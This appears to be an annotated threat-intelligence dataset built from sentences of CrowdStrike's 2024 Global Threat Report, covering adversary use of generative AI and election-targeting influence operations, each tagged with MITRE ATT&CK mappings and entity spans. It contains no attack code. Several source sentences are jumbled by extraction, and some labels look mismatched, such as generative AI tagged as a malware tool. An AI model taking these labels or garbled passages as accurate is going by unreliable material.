"crowdstrike-51_crowdstrike_report-p32-s285-e795cf", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 32, "sentence_id": 285, "context_before": "It can also potentially lower the entry barrier to the threat landscape for less sophisticated threat actors.", "sentence_text": "Two primary generative AI opportunity areas within the threat landscape include: » GENERATIVE AI HAS MASSIVELY ► Developing and/or executing malicious computer network DEMOCRATIZED COMPUTING TO operations (CNO), including tool and resource development such as IMPROVE ADVERSARY OPERATIONS.\nscripts or code that could be functionally malicious if used correctly IT CAN ALSO POTENTIALLY LOWER THE ENTRY BARRIER TO THE ► Supporting the efficiency and effectiveness of social engineering THREAT LANDSCAPE FOR LESS and information operations campaigns SOPHISTICATED THREAT ACTORS.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" }, { "id": "T1072", "name": "Software Deployment Tools" } ], "procedure": "Developing and executing malicious computer network CNO", "entities": [ { "text": "GENERATIVE AI", "start": 83, "end": 96, "label": "MalwareTool" }, { "text": "Developing ", "start": 113, "end": 124, "label": "Action" }, { "text": "executing ", "start": 131, "end": 141, "label": "Action" }, { "text": "computer network", "start": 151, "end": 167, "label": "Infrastructure_Indicator" }, { "text": "CNO", "start": 206, "end": 209, "label": "Infrastructure_Indicator" }, { "text": "tool and resource development", "start": 222, "end": 251, "label": "Action" }, { "text": "scripts or code", "start": 290, "end": 305, "label": "MalwareTool" }, { "text": "operations ", "start": 194, "end": 205, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p32-s286-d6f966", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 32, "sentence_id": 286, "context_before": "Two primary generative AI opportunity areas within the threat landscape include: » GENERATIVE AI HAS MASSIVELY ► Developing and/or executing malicious computer network DEMOCRATIZED COMPUTING TO operations (CNO), including tool and resource development such as IMPROVE ADVERSARY OPERATIONS.\nscripts or code that could be functionally malicious if used correctly IT CAN ALSO POTENTIALLY LOWER THE ENTRY BARRIER TO THE ► Supporting the efficiency and effectiveness of social engineering THREAT LANDSCAPE FOR LESS and information operations campaigns SOPHISTICATED THREAT ACTORS.", "sentence_text": "Generative AI in Malicious Computer Network Operations It’s difficult to confidently gauge the probability of adversaries using newer technologies such as generative AI in their operations, particularly in relation to how these technologies will support malicious CNO.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p32-s287-6fe3e6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 32, "sentence_id": 287, "context_before": "Generative AI in Malicious Computer Network Operations It’s difficult to confidently gauge the probability of adversaries using newer technologies such as generative AI in their operations, particularly in relation to how these technologies will support malicious CNO.", "sentence_text": "Only rare concrete observations included likely adversary use of generative AI during some operational phases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p32-s288-0aa503", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 32, "sentence_id": 288, "context_before": "Only rare concrete observations included likely adversary use of generative AI during some operational phases.", "sentence_text": "This is either a result of limited observations, the fact that the AI- generated material did not intrinsically leave significant indicators of its true nature or adversaries taking steps to avoid revealing evidence that generative AI was in use.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p32-s289-a20015", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 32, "sentence_id": 289, "context_before": "This is either a result of limited observations, the fact that the AI- generated material did not intrinsically leave significant indicators of its true nature or adversaries taking steps to avoid revealing evidence that generative AI was in use.", "sentence_text": "Throughout 2023, generative AI was rarely observed supporting malicious CNO development and/or execution.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" }, { "id": "T1072", "name": "Software Deployment Tools" } ], "procedure": "malicious CNO development and execution", "entities": [ { "text": "malicious CNO", "start": 62, "end": 75, "label": "MalwareTool" }, { "text": "development ", "start": 76, "end": 88, "label": "Action" }, { "text": "execution", "start": 95, "end": 104, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p33-s290-08641b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 33, "sentence_id": 290, "context_before": "Throughout 2023, generative AI was rarely observed supporting malicious CNO development and/or execution.", "sentence_text": "INDRIK\nSPIDER\nIn February 2023, CrowdStrike Services responded to an INDRIK SPIDER incident involving BITWISE SPIDER’s LockBit RED ransomware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p33-s291-903025", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 33, "sentence_id": 291, "context_before": "INDRIK\nSPIDER\nIn February 2023, CrowdStrike Services responded to an INDRIK SPIDER incident involving BITWISE SPIDER’s LockBit RED ransomware.", "sentence_text": "During this incident, INDRIK SPIDER exfiltrated credentials from cloud-based credential manager Azure Key Vault.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1555.006", "name": "Cloud Secrets Management Stores" } ], "procedure": "Exfiltrated credentials from cloud storge", "entities": [ { "text": "INDRIK SPIDER", "start": 22, "end": 35, "label": "ThreatActor" }, { "text": "exfiltrated credentials", "start": 36, "end": 59, "label": "Action" }, { "text": "cloud-based credential manager Azure Key Vault", "start": 65, "end": 111, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p33-s292-d9333f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 33, "sentence_id": 292, "context_before": "During this incident, INDRIK SPIDER exfiltrated credentials from cloud-based credential manager Azure Key Vault.", "sentence_text": "Logs show that INDRIK SPIDER also visited ChatGPT while interacting with the Azure Portal.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p33-s293-c2f0b5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 33, "sentence_id": 293, "context_before": "Logs show that INDRIK SPIDER also visited ChatGPT while interacting with the Azure Portal.", "sentence_text": "In addition to visiting ChatGPT while browsing the Azure Portal — presumably to understand how to navigate in Azure — browsing activity analysis indicates INDRIK SPIDER used search engines such as Google and Bing and searched on GitHub during the operations to understand how to exfiltrate Azure Key Vault credentials.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1608", "name": "Stage Capabilities" }, { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "The threat actor INDRIK SPIDER uses search engines and GitHub to gather information on how to exfiltrate Azure Key Vault credentials.", "entities": [ { "text": "INDRIK SPIDER", "start": 155, "end": 168, "label": "ThreatActor" }, { "text": "used search engines", "start": 169, "end": 188, "label": "Action" }, { "text": "searched on GitHub", "start": 217, "end": 235, "label": "Action" }, { "text": "exfiltrate Azure Key Vault credentials", "start": 279, "end": 317, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p33-s294-931e4c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 33, "sentence_id": 294, "context_before": "In addition to visiting ChatGPT while browsing the Azure Portal — presumably to understand how to navigate in Azure — browsing activity analysis indicates INDRIK SPIDER used search engines such as Google and Bing and searched on GitHub during the operations to understand how to exfiltrate Azure Key Vault credentials.", "sentence_text": "Using search engines and visiting ChatGPT indicate that though INDRIK SPIDER is likely new to the cloud and not yet sophisticated in this domain, it is using generative AI to fill these knowledge gaps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p33-s295-0ecae9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 33, "sentence_id": 295, "context_before": "Using search engines and visiting ChatGPT indicate that though INDRIK SPIDER is likely new to the cloud and not yet sophisticated in this domain, it is using generative AI to fill these knowledge gaps.", "sentence_text": "SCATTERED\nSPIDER\nIn the second half of 2023, SCATTERED SPIDER used the Azure AD PowerShell module to download all Entra ID user immutable IDs at a North American financial services victim.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1119", "name": "Automated Collection" }, { "id": "T1213", "name": "Data from Information Repositories" } ], "procedure": "Used powershell to download user IDs", "entities": [ { "text": "SCATTERED SPIDER", "start": 45, "end": 61, "label": "ThreatActor" }, { "text": "Azure AD PowerShell module", "start": 71, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "download ", "start": 101, "end": 110, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p33-s296-2eac8e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 33, "sentence_id": 296, "context_before": "SCATTERED\nSPIDER\nIn the second half of 2023, SCATTERED SPIDER used the Azure AD PowerShell module to download all Entra ID user immutable IDs at a North American financial services victim.", "sentence_text": "Using its Entra ID backdoor, the adversary could log in as any of the downloaded users.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1656", "name": "Impersonation" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Log in using downloaded users", "entities": [ { "text": "log in", "start": 49, "end": 55, "label": "Action" }, { "text": "Entra ID backdoor", "start": 10, "end": 27, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p33-s297-fb6fff", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 33, "sentence_id": 297, "context_before": "Using its Entra ID backdoor, the adversary could log in as any of the downloaded users.", "sentence_text": "The PowerShell used to download the users’ immutable IDs resembled large language model (LLM) outputs such as those from ChatGPT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p33-s298-b29f8a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 33, "sentence_id": 298, "context_before": "The PowerShell used to download the users’ immutable IDs resembled large language model (LLM) outputs such as those from ChatGPT.", "sentence_text": "Based on the similar code style, SCATTERED SPIDER likely relied on an LLM to generate the PowerShell script in this activity.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.007", "name": "Artificial Intelligence" } ], "procedure": "Used LLM to generate PowerShell scripts", "entities": [ { "text": "SCATTERED SPIDER", "start": 33, "end": 49, "label": "ThreatActor" }, { "text": "relied on an LLM to generate the PowerShell script", "start": 57, "end": 107, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p34-s299-0362c4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 34, "sentence_id": 299, "context_before": "Based on the similar code style, SCATTERED SPIDER likely relied on an LLM to generate the PowerShell script in this activity.", "sentence_text": "2024 GLOBAL THREAT REPORT CrowdStrike 34 Generative AI in Social Engineering and Information Operations", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p34-s300-5fb040", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 34, "sentence_id": 300, "context_before": "2024 GLOBAL THREAT REPORT CrowdStrike 34 Generative AI in Social Engineering and Information Operations", "sentence_text": "Researchers and academics have further speculated that threat actors will almost certainly use generative AI tools in information and influence operations in the near future.7 These speculations began actualizing in 2023:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p34-s301-2c31e0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 34, "sentence_id": 301, "context_before": "Researchers and academics have further speculated that threat actors will almost certainly use generative AI tools in information and influence operations in the near future.7 These speculations began actualizing in 2023:", "sentence_text": "Beyond state-nexus actors, CrowdStrike also observed a hacktivist group attempting to create a spam tool using generative AI as part of its efforts to disseminate pro-Azerbaijan messaging.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.007", "name": "Artificial Intelligence" } ], "procedure": "Create spam tool to disseminate messages", "entities": [ { "text": "hacktivist group", "start": 55, "end": 71, "label": "ThreatActor" }, { "text": "spam tool", "start": 95, "end": 104, "label": "MalwareTool" }, { "text": "generative AI", "start": 111, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "disseminate pro-Azerbaijan messaging", "start": 151, "end": 187, "label": "Action" }, { "text": "create ", "start": 86, "end": 93, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p34-s302-c25523", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 34, "sentence_id": 302, "context_before": "Beyond state-nexus actors, CrowdStrike also observed a hacktivist group attempting to create a spam tool using generative AI as part of its efforts to disseminate pro-Azerbaijan messaging.", "sentence_text": "Outlook\nGenerative AI has potential for use in numerous fields not likely identified or popularized in mainstream public discourse.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p34-s303-37d53c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 34, "sentence_id": 303, "context_before": "Outlook\nGenerative AI has potential for use in numerous fields not likely identified or popularized in mainstream public discourse.", "sentence_text": "AI’s continuous development will undoubtedly increase the potency of its potential misuse — particularly within the scope of information operations and especially for less digitally literate audiences.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p34-s304-d64de4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 34, "sentence_id": 304, "context_before": "AI’s continuous development will undoubtedly increase the potency of its potential misuse — particularly within the scope of information operations and especially for less digitally literate audiences.", "sentence_text": "The degree to which popular generative AI tools can be used maliciously will likely adapt over time as companies, tool owners and governments respond to new developments and perceived misuse.\ncontinues to gain popularity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p34-s305-a8dddb", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 34, "sentence_id": 305, "context_before": "The degree to which popular generative AI tools can be used maliciously will likely adapt over time as companies, tool owners and governments respond to new developments and perceived misuse.\ncontinues to gain popularity.", "sentence_text": "► Adversaries’ attempts to develop their own models or generative AI tools that require less prompt engineering.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Develop models and generative AI tools", "entities": [ { "text": "develop ", "start": 27, "end": 35, "label": "Action" }, { "text": "models ", "start": 45, "end": 52, "label": "MalwareTool" }, { "text": "generative AI tools", "start": 55, "end": 74, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p34-s306-cff985", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 34, "sentence_id": 306, "context_before": "► Adversaries’ attempts to develop their own models or generative AI tools that require less prompt engineering.", "sentence_text": "5 https://apnews.com/article/7f49bd9aa9d1427d8400e40beb9f5ba4\n6 https://apnews.com/article/artificial-intelligence-images-rights-1c6d9e0e260e2d135a3e3bf98d5493df\n7 https://cdn.openai.com/papers/forecasting-misuse.pdf", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p35-s307-856bb4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 35, "sentence_id": 307, "context_before": "5 https://apnews.com/article/7f49bd9aa9d1427d8400e40beb9f5ba4\n6 https://apnews.com/article/artificial-intelligence-images-rights-1c6d9e0e260e2d135a3e3bf98d5493df\n7 https://cdn.openai.com/papers/forecasting-misuse.pdf", "sentence_text": "This includes seven of the 10 most populous countries in the world:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p35-s308-3b157c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 35, "sentence_id": 308, "context_before": "This includes seven of the 10 most populous countries in the world:", "sentence_text": "Election Targeting\nCyber activity targeting elections can range from direct attempts to disrupt electoral processes to more indirect efforts to sway voter opinion toward outcomes preferredby the adversary.8", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491.002", "name": "External Defacement" } ], "procedure": "Target elections through attempts to disrupt electoral processes or influence voter opinion toward adversary-preferred outcomes.", "entities": [ { "text": "targeting elections", "start": 34, "end": 53, "label": "Action" }, { "text": "disrupt electoral processes", "start": 88, "end": 115, "label": "Action" }, { "text": "sway voter opinion", "start": 144, "end": 162, "label": "Action" }, { "text": "adversary", "start": 195, "end": 204, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p35-s309-5c410f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 35, "sentence_id": 309, "context_before": "Election Targeting\nCyber activity targeting elections can range from direct attempts to disrupt electoral processes to more indirect efforts to sway voter opinion toward outcomes preferredby the adversary.8", "sentence_text": "This form of election interference can range from using computer MORE THAN 42% OF THE GLOBAL network attacks to intentionally disrupt, degrade or destroy voting systems to using POPULATION WILL PARTICIPATE IN privileged access or vulnerabilities to attempt to alter vote counts without detection.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1489", "name": "Service Stop" }, { "id": "T1529", "name": "System Shutdown/Reboot" }, { "id": "T1588.006", "name": "Vulnerabilities" }, { "id": "T1650", "name": "Acquire Access" } ], "procedure": "Using computer network attacks to destroy voting systems", "entities": [ { "text": "network attacks ", "start": 93, "end": 109, "label": "Action" }, { "text": "destroy voting systems", "start": 146, "end": 168, "label": "Action" }, { "text": "alter ", "start": 260, "end": 266, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p35-s310-88a4d6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 35, "sentence_id": 310, "context_before": "This form of election interference can range from using computer MORE THAN 42% OF THE GLOBAL network attacks to intentionally disrupt, degrade or destroy voting systems to using POPULATION WILL PARTICIPATE IN privileged access or vulnerabilities to attempt to alter vote counts without detection.", "sentence_text": "PRESIDENTIAL, PARLIAMENTARY\nAND/OR GENERAL ELECTIONS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p35-s311-96dbbe", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 35, "sentence_id": 311, "context_before": "PRESIDENTIAL, PARLIAMENTARY\nAND/OR GENERAL ELECTIONS.", "sentence_text": "The least direct type of election targeting — but almost certainly the most common and typically the most difficult to prevent — involves distributing mis- or disinformation to electorates before, during and after voting processes in an effort to influence popular opinion.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491.001", "name": "Internal Defacement" } ], "procedure": "Distribute mis- or disinformation to electorates before, during, and after voting processes to influence popular opinion.", "entities": [ { "text": "distributing mis- or disinformation", "start": 138, "end": 173, "label": "Action" }, { "text": "influence popular opinion", "start": 247, "end": 272, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p35-s312-a5a9d1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 35, "sentence_id": 312, "context_before": "The least direct type of election targeting — but almost certainly the most common and typically the most difficult to prevent — involves distributing mis- or disinformation to electorates before, during and after voting processes in an effort to influence popular opinion.", "sentence_text": "These information operations can take many forms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p35-s313-61b30d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 35, "sentence_id": 313, "context_before": "These information operations can take many forms.", "sentence_text": "Other operations may aim to reinforce perspectives that portray the threat actor responsible in a more positive light;\nfor example, as an advocate for specific policy positions beneficial to that entity or representative of cooperation or coexistence rhetoric.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p36-s314-5945f0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 36, "sentence_id": 314, "context_before": "Other operations may aim to reinforce perspectives that portray the threat actor responsible in a more positive light; for example, as an advocate for specific policy positions beneficial to that entity or representative of cooperation or coexistence rhetoric.", "sentence_text": "They sent threatening emails to voters, alleging to represent a far-right U.S. political group and directing recipients to vote for a specific candidate.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Sent threatening emails to voters impersonating a political group and directing them to vote for a specific candidate.", "entities": [ { "text": "sent threatening emails", "start": 5, "end": 28, "label": "Action" }, { "text": "voters", "start": 32, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "directing recipients to vote for a specific candidate", "start": 99, "end": 152, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p36-s315-07e597", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 36, "sentence_id": 315, "context_before": "They sent threatening emails to voters, alleging to represent a far-right U.S. political group and directing recipients to vote for a specific candidate.", "sentence_text": "Iranian threat actors also disseminated a video falsely alleging to depict overseas actors fabricating ballots, implying one particular political party would seek to exploit security vulnerabilities and compromise voting systems.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Data Manipulation: Stored Data Manipulation" } ], "procedure": "disseminated a false video alleging ballot fabrication to influence perceptions of election integrity", "entities": [ { "text": "Iranian threat actors", "start": 0, "end": 21, "label": "ThreatActor" }, { "text": "disseminated a video falsely alleging to depict overseas actors fabricating ballots", "start": 27, "end": 110, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p36-s316-84790e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 36, "sentence_id": 316, "context_before": "Iranian threat actors also disseminated a video falsely alleging to depict overseas actors fabricating ballots, implying one particular political party would seek to exploit security vulnerabilities and compromise voting systems.", "sentence_text": "Outlook\nThe most common malicious activities targeting elections have historically involved information operations likely conducted by state-nexus entities against citizens of countries that hold specific geopolitical interest to the threat actor and simple, short-lived hacktivism — including DDoS attacks and website defacements — against state and local government entities.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491", "name": "Defacement" }, { "id": "T1498.001", "name": "Direct Network Flood" } ], "procedure": "DDoS attacks and website defacements against government entities", "entities": [ { "text": "hacktivism ", "start": 271, "end": 282, "label": "ThreatActor" }, { "text": "DDoS", "start": 294, "end": 298, "label": "Action" }, { "text": "defacements ", "start": 319, "end": 331, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p36-s317-8e817b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 36, "sentence_id": 317, "context_before": "Outlook\nThe most common malicious activities targeting elections have historically involved information operations likely conducted by state-nexus entities against citizens of countries that hold specific geopolitical interest to the threat actor and simple, short-lived hacktivism — including DDoS attacks and website defacements — against state and local government entities.", "sentence_text": "This trend is highly likely to continue in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s318-5d71f0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 318, "context_before": "This trend is highly likely to continue in 2024.", "sentence_text": "FEBRUARY RWANDA ICELAND 15 JULY SRI LANKA 1 JUNE PAKISTAN TBD MARCH 8 FEBRUARY ALGERIA MEXICO TOGO SOLOMON ISLANDS TBD DECEMBER 2 INDONESIA TBD APRIL March JUNEBELGIUM CROATIA 14 FEBRUARY TBD 9 JUNE TBD DECEMBER INDIA BELARUS CHAD TBD APRIL SAN MARINO 25 FEBRUARY ROMANIA TBD OCTOBER TBD DECEMBER TBD NOVEMBER SOUTH KOREA", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s319-585846", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 319, "context_before": "FEBRUARY RWANDA ICELAND 15 JULY SRI LANKA 1 JUNE PAKISTAN TBD MARCH 8 FEBRUARY ALGERIA MEXICO TOGO SOLOMON ISLANDS TBD DECEMBER 2 INDONESIA TBD APRIL March JUNEBELGIUM CROATIA 14 FEBRUARY TBD 9 JUNE TBD DECEMBER INDIA BELARUS CHAD TBD APRIL SAN MARINO 25 FEBRUARY ROMANIA TBD OCTOBER TBD DECEMBER TBD NOVEMBER SOUTH KOREA", "sentence_text": "MADAGASCAR BOTSWANA SENEGAL 10 APRIL TBD MAY TBD OCTOBER 25 FEBRUARY UNITED STATES 5 NOVEMBER MAURITIUS PANAMA CAMBODIA MOZAMBIQUE RUSSIA 30 NOVEMBER 5 MAY 25 FEBRUARY MAURITANIA 17 MARCH PALAU 9 OCTOBER GEORGIA GHANA 22 JUNE 12 NOVEMBER 26 OCTOBER IRAN LITHUANIA 7 DECEMBER NO ELECTIONS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s320-587131", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 320, "context_before": "MADAGASCAR BOTSWANA SENEGAL 10 APRIL TBD MAY TBD OCTOBER 25 FEBRUARY UNITED STATES 5 NOVEMBER MAURITIUS PANAMA CAMBODIA MOZAMBIQUE RUSSIA 30 NOVEMBER 5 MAY 25 FEBRUARY MAURITANIA 17 MARCH PALAU 9 OCTOBER GEORGIA GHANA 22 JUNE 12 NOVEMBER 26 OCTOBER IRAN LITHUANIA 7 DECEMBER NO ELECTIONS", "sentence_text": "MONGOLIA ANNOUCED URUGUAY 1 MARCHPORTUGAL 12 MAY DOMINICAN 28 JUNE YET FOR AUG-SEP 27 OCTOBER 10 MARCH MALI REPUBLIC TBD FEBRUARY 19 MAY JANUARY FEBRUARY MARCH APRIL MAY JUNE JULY OCTOBER NOVEMBER DECEMBER In 2024, countries of interest involved in election", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s321-ca8ad5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 321, "context_before": "MONGOLIA ANNOUCED URUGUAY 1 MARCHPORTUGAL 12 MAY DOMINICAN 28 JUNE YET FOR AUG-SEP 27 OCTOBER 10 MARCH MALI REPUBLIC TBD FEBRUARY 19 MAY JANUARY FEBRUARY MARCH APRIL MAY JUNE JULY OCTOBER NOVEMBER DECEMBER In 2024, countries of interest involved in election", "sentence_text": "The overall polarization of the political spectrum in many cycles will likely be at risk of significant and lengthy IO countries amid continuing economic and social issues campaigns from major global powers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s322-506b1f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 322, "context_before": "The overall polarization of the political spectrum in many cycles will likely be at risk of significant and lengthy IO countries amid continuing economic and social issues campaigns from major global powers.", "sentence_text": "Russia and Iran will likely increase the susceptibility of those countries’ will likely leverage IO against the U.S. and the EU, which citizenries to IO — particularly IO campaigns targeted at they consider major geopolitical opponents.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s323-13d2b5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 323, "context_before": "Russia and Iran will likely increase the susceptibility of those countries’ will likely leverage IO against the U.S. and the EU, which citizenries to IO — particularly IO campaigns targeted at they consider major geopolitical opponents.", "sentence_text": "India and for adversary exploitation using these platforms to Pakistan are highly likely to conduct significant IO disseminate IO narratives.11 campaigns against one another during their respective elections in April and February 2024, particularly given With such political environments currently existing in the current political upheaval and polarization in both most of the large and geopolitically significant countries, countries.9 2024 will almost certainly present a challenging global test for democracies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s324-15687f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 324, "context_before": "India and for adversary exploitation using these platforms to Pakistan are highly likely to conduct significant IO disseminate IO narratives.11 campaigns against one another during their respective elections in April and February 2024, particularly given With such political environments currently existing in the current political upheaval and polarization in both most of the large and geopolitically significant countries, countries.9 2024 will almost certainly present a challenging global test for democracies.", "sentence_text": "Given the ease with which AI tools can generate deceptive but convincing narratives, adversaries will highly likely use such tools to conduct IO against elections in 2024.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.007", "name": "Artificial Intelligence" } ], "procedure": "Use AI tools to generate deceptive narratives and conduct information operations against elections.", "entities": [ { "text": "AI tools", "start": 26, "end": 34, "label": "MalwareTool" }, { "text": "generate deceptive but convincing narratives", "start": 39, "end": 83, "label": "Action" }, { "text": "adversaries", "start": 85, "end": 96, "label": "ThreatActor" }, { "text": "use such tools to conduct IO", "start": 116, "end": 144, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p37-s325-cf5f25", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 37, "sentence_id": 325, "context_before": "Given the ease with which AI tools can 